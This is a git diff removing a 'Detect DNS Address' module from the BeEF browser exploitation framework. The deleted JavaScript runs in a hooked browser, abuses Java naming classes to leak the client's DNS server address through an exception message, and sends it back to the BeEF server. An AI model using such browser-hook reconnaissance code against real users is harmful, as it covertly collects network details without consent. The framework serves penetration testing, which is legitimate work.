diff --git a/modules/network/detect_dns_address/command.js b/modules/network/detect_dns_address/command.js
deleted file mode 100644
index ab6c7849e..000000000
--- a/modules/network/detect_dns_address/command.js
+++ /dev/null
@@ -1,70 +0,0 @@
-//
-// Copyright 2011 Wade Alcorn wade@bindshell.net
-//
-// Licensed under the Apache License, Version 2.0 (the "License");
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-//
-// http://www.apache.org/licenses/LICENSE-2.0
-//
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an "AS IS" BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-//
-beef.execute(function() {
-
- var command_timeout = "<%= @command_timeout %>";
- var Packz = undefined;
- var internal_counter = 0;
-
- content = "";
- $j('body').append(content);
-
- function checkDns() {
-
- var result = "";
-
- try {
- var env = new Packages.java.util.Hashtable();
- env.put("java.naming.factory.initial", "com.sun.jndi.dns.DnsContextFactory");
- env.put("java.naming.provider.url", "dns://");
- var ctx = new Packages.javax.naming.directory.InitialDirContext(env);
- var attrs = ctx.getAttributes("localhost",['*']);
- } catch(e) {
- var d="";
- if (typeof e != "string") d=e.message; else d=e.toString();
- var re=new RegExp("java.net.SocketPermission.([^:]*)");
- var g=re.exec(d);
- result = g[1];
- }
-
- return(result);
- }
-
- function waituntilok() {
-
- try {
- var output = checkDns();
-
- if (output != null) {
- beef.net.send('<%= @command_url %>', <%= @command_id %>, "dns_address="+output);
- $j('#beefdns').detach();
- return;
- } else throw("command results haven't been returned yet");
- } catch (e) {
-
- internal_counter++;
- if (internal_counter > command_timeout) {
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=time out');
- $j('#beefdns').detach();
- return;
- }
- setTimeout(function() {waituntilok()},1000);
- }
- }
-
- waituntilok();
-
-});
diff --git a/modules/network/detect_dns_address/config.yaml b/modules/network/detect_dns_address/config.yaml
deleted file mode 100644
index fa0c3aac4..000000000
--- a/modules/network/detect_dns_address/config.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-beef:
- module:
- detect_dns_address:
- enable: true
- category: "Network"
- name: "Detect DNS Address"
- description: "Detects the client's DNS address using Java."
- authors: ["bcoles"]
- target:
- working: "FF"
- user_notify: "IE"
- not_working: ["S", "O", "C"]
diff --git a/modules/network/detect_dns_address/doNothing.class b/modules/network/detect_dns_address/doNothing.class
deleted file mode 100644
index 7e67f8fe8..000000000
Binary files a/modules/network/detect_dns_address/doNothing.class and /dev/null differ
diff --git a/modules/network/detect_dns_address/module.rb b/modules/network/detect_dns_address/module.rb
deleted file mode 100644
index d9f78c971..000000000
--- a/modules/network/detect_dns_address/module.rb
+++ /dev/null
@@ -1,46 +0,0 @@
-#
-# Copyright 2011 Wade Alcorn wade@bindshell.net
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-# Uses the Packages.javax.naming package with DNS of "dns://"
-# Technique discovered by Stefano Di Paola from Minded Security Research Labs
-# Advisory: http://blog.mindedsecurity.com/2010/10/get-internal-network-information-with.html
-
-class Detect_dns_address < BeEF::Core::Command
-
- def pre_send
- # Mount the doNothing.class on /doNothing.class
- # Unsure if there's something we can add here to check if the module was already mounted?
- BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/detect_dns_address/doNothing.class','/doNothing','class')
- end
-
- def self.options
- return [
- {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}
- ]
- end
-
- def callback
- content = {}
- content['dns_address'] = @datastore['dns_address'] if not @datastore['dns_address'].nil?
- content['fail'] = @datastore['fail'] if not @datastore['fail'].nil?
- content['fail'] = 'could not detect dns address' if content.empty?
- save content
-
- # Unmount the class now, it's no longer required.
- BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/doNothing.class');
-
- end
-
-end